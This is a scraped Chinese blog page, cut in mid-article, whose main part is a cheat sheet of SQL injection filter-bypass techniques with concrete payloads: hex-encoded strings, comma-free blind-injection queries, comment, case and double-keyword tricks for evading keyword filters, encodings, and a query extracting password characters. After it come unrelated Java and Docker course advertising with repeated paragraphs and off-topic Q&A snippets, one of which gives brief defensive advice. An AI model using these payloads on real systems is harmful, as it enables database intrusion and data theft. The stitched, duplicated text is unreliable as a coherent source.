黑客常用SQL注入绕过技术总结!(冰河吐血整理

(from for属于逗号绕过下面会有)

上面的方法既没有逗号也没有空格。猜解database()第一个字符ascii码是否为109,若是则加载延时。

3.引号绕过(使用十六进制)

会使用到引号的地方一般是在最后的where子句中。如下面的一条sql语句,这条语句就是一个简单的用来查选得到users表中所有字段的一条语句:

select column_name from information_schema.tables where table_name=“users”

这个时候如果引号被过滤了,那么上面的where子句就无法使用了。那么遇到这样的问题就要使用十六进制来处理这个问题了。

users的十六进制的字符串是7573657273。那么最后的sql语句就变为了:

select column_name from information_schema.tables where table_name=0x7573657273

4.逗号绕过(使用from或者offset)

在使用盲注的时候,需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用from to的方式来解决:

select substr(database() from 1 for 1);

select mid(database() from 1 for 1);

使用join:

union select 1,2 #等价于

union select * from (select 1)a join (select 2)b

使用like:

select ascii(mid(user(),1,1))=80 #等价于

select user() like ‘r%’

对于limit可以使用offset来绕过:

select * from news limit 0,1

# 等价于下面这条SQL语句

select * from news limit 1 offset 0

5.比较符号(<>)绕过(过滤了<>:sqlmap盲注经常使用<>,使用between的脚本)

使用greatest()、least():(前者返回最大值,后者返回最小值)

同样是在使用盲注的时候,在使用二分查找的时候需要使用到比较操作符来进行查找。如果无法使用比较操作符,那么就需要使用到greatest来进行绕过了。

最常见的一个盲注的sql语句:

select * from users where id=1 and ascii(substr(database(),0,1))>64

此时如果比较操作符被过滤,上面的盲注语句则无法使用,那么就可以使用greatest来代替比较操作符了。greatest(n1,n2,n3,…)函数返回输入参数(n1,n2,n3,…)的最大值。

那么上面的这条sql语句可以使用greatest变为如下的子句:

select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64

使用between and:

between a and b:返回a,b之间的数据,不包含b。

6.or and xor not绕过

and=&& or=|| xor=| not=!

7.绕过注释符号(#,–(后面跟一个空格))过滤

id=1’ union select 1,2,3||'1

最后的or '1闭合查询语句的最后的单引号,或者:

id=1’ union select 1,2,'3

8.=绕过

使用like 、rlike 、regexp 或者 使用< 或者 >

9.绕过union,select,where等

(1)使用注释符绕过

常用注释符:

//,-- , /**/, #, --+, – -, ;,%00,–a

用法:

U// NION // SE// LECT //user,pwd from user

(2)使用大小写绕过

id=-1’UnIoN/**/SeLeCT

(3)内联注释绕过

id=-1’/!UnIoN/ SeLeCT 1,2,concat(/!table_name/) FrOM /information_schema/.tables /!WHERE //!TaBlE_ScHeMa/ like database()#

(4) 双关键字绕过(若删除掉第一个匹配的union就能绕过)

id=-1’UNIunionONSeLselectECT1,2,3–-

10.通用绕过(编码)

如URLEncode编码,ASCII,HEX,unicode编码绕过:

or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。

11.等价函数绕过

hex()、bin() ==> ascii()

sleep() ==>benchmark()

concat_ws()==>group_concat()

mid()、substr() ==> substring()

@@user ==> user()

@@datadir ==> datadir()

举例:substring()和substr()无法使用时:

?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74

或者:

substr((select ‘password’),1,1) = 0x70

strcmp(left(‘password’,1), 0x69) = 1

strcmp(left(‘password’,1), 0x70) = 0

strcmp(left(‘password’,1), 0x71) = -1

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年Java开发全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上Java开发知识点,真正体系化!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

如果你觉得这些内容对你有帮助,可以扫码获取!!(备注Java获取)

img

最后

权威指南-第一本Docker书

引领完成Docker的安装、部署、管理和扩展,让其经历从测试到生产的整个开发生命周期,深入了解Docker适用于什么场景。并且这本Docker的学习权威指南介绍了其组件的基础知识,然后用Docker构建容器和服务来完成各种任务:利用Docker为新项目建立测试环境,演示如何使用持续集成的工作流集成Docker,如何构建应用程序服务和平台,如何使用Docker的API,如何扩展Docker。

总共包含了:简介、安装Docker、Docker入门、使用Docker镜像和仓库、在测试中使用Docker、使用Docker构建服务、使用Fig编配Docke、使用Docker API、获得帮助和对Docker进行改进等9个章节的知识。

image

image

image

image

关于阿里内部都在强烈推荐使用的“K8S+Docker学习指南”—《深入浅出Kubernetes:理论+实战》、《权威指南-第一本Docker书》,看完之后两个字形容,爱了爱了!
《一线大厂Java面试题解析+核心总结学习笔记+最新讲解视频+实战项目源码》点击传送门即可获取!
用Docker API、获得帮助和对Docker进行改进等9个章节的知识。

[外链图片转存中…(img-8yDKiMcG-1712544081827)]

[外链图片转存中…(img-5s1saRWp-1712544081827)]

[外链图片转存中…(img-ljNL1qBV-1712544081828)]

[外链图片转存中…(img-7q6x44B4-1712544081828)]

关于阿里内部都在强烈推荐使用的“K8S+Docker学习指南”—《深入浅出Kubernetes:理论+实战》、《权威指南-第一本Docker书》,看完之后两个字形容,爱了爱了!
《一线大厂Java面试题解析+核心总结学习笔记+最新讲解视频+实战项目源码》点击传送门即可获取!

  • 17
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
### 回答1: SQL(Structured Query Language)是用于关系数据库管理系统的标准语言,用于检索和管理数据。下面是SQL中一些常见的插入语法: 1. 使用INSERT INTO语句插入新数据行: INSERT INTO table_name (column1, column2, column3, ...) VALUES (value1, value2, value3, ...); 2. 使用INSERT INTO SELECT语句将查询结果插入到表中: INSERT INTO table_name (column1, column2, column3, ...) SELECT column1, column2, column3, ... FROM another_table WHERE condition; 3. 使用INSERT INTO VALUES语句插入多个数据行: INSERT INTO table_name (column1, column2, column3, ...) VALUES (value1, value2, value3, ...), (value4, value5, value6, ...), (value7, value8, value9, ...); 希望这能帮到您! ### 回答2: SQL注入绕过方式是黑客利用网站没有对用户输入的SQL语句进行充分验证和过滤所导致的攻击方式。以下是一些常见的SQL注入绕过方式: 1. 字符串拼接绕过:在SQL注入攻击时,黑客通常会在用户输入的字符串中插入SQL语句,以改变原始SQL查询的逻辑。为了避免被检测到,黑客可能会使用字符串拼接来规避特殊字符的检测,例如用两个单引号代替一个单引号绕过检测。 2. 注释绕过黑客可能会在SQL语句中使用注释符号来注释掉原始查询的结尾部分,然后插入自己的恶意SQL语句。 3. UNION注入:黑客可以利用UNION关键字将两个查询结果进行连接,并将恶意代码插入到UNION查询的结果中。 4. 盲注入:黑客通过盲目地猜测和推测来进行注入攻击,而不直接得到返回的数据。这种方式需要黑客进行更多的尝试和推测,但可以避免产生错误消息。 5. 布尔注入:黑客使用布尔逻辑来决定SQL语句的真假,通过观察不同的页面响应结果,从而推测SQL查询的结果。 为了防止SQL注入攻击,开发人员应该采取以下措施: - 使用参数化查询或预编译语句,而不是拼接用户输入的字符串来构建SQL语句。 - 对用户输入的数据进行严格的验证和过滤,确保只有合法的数据可以用于构建SQL查询。 - 应用程序的数据库账户应该具有最小的权限,避免对数据库进行敏感操作。 - 对所有输入进行输入验证,确保输入符合预期类型和长度。 - 及时更新和修补数据库系统和应用程序的漏洞。 ### 回答3: SQL注入是一种利用输入参数中的恶意SQL代码来绕过应用程序对数据的合法性验证的攻击方法。以下是常见的SQL注入绕过方式: 1. 基于输入的绕过方式:攻击者可以通过在输入中插入特殊字符或语法来破坏原有的SQL查询结构,从而绕过检查。例如,在输入中插入单引号、双引号、分号等特殊字符可以破坏SQL查询的语法。 2. 基于语句拼接的绕过方式:当应用程序使用字符串拼接构造SQL语句时,攻击者可以通过向拼接的字符串中插入恶意代码来执行额外的SQL语句。这种方式下,攻击者可以通过构造恶意代码来绕过应用程序的SQL检查。 3. 基于注释的绕过方式:攻击者可以使用SQL注释符号(例如"--")来注释掉原有的SQL语句,然后插入恶意代码。这种方式下,恶意代码不会被应用程序识别为SQL语句,从而绕过SQL检查。 4. 基于联合查询的绕过方式:攻击者可以通过在恶意输入中插入UNION关键字来将恶意查询和原始查询合并在一起执行。这种方式可以让攻击者获取未授权的数据或执行未授权的操作。 5. 基于错误消息的绕过方式:攻击者可以通过构造特定的恶意输入来引发SQL语法错误,从而导致应用程序返回详细的错误消息。这些错误消息可能包含敏感信息,例如数据库结构、查询逻辑等,攻击者可以利用这些信息来进一步攻击系统。 为了防止SQL注入攻击,开发人员应该采取以下措施:使用参数化查询或预编译语句来避免使用字符串拼接,对输入进行严格的验证和过滤,限制用户对数据库的权限,将敏感信息加密存储等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值